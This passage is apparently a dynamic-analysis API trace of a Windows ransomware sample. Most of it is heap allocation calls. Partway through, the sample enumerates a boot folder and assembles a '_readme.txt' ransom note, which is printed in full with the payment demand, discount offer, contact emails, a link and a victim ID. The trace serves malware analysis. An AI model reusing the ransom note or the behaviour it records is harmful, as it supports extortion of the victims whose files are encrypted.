dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.728] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0200.728] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.728] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.728] PathFindFileNameW (pszPath="") returned="" [0200.728] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.729] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.729] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.729] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.729] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0200.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.729] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0200.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.730] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.730] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.730] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.730] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.730] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.731] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.731] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.731] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.731] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, 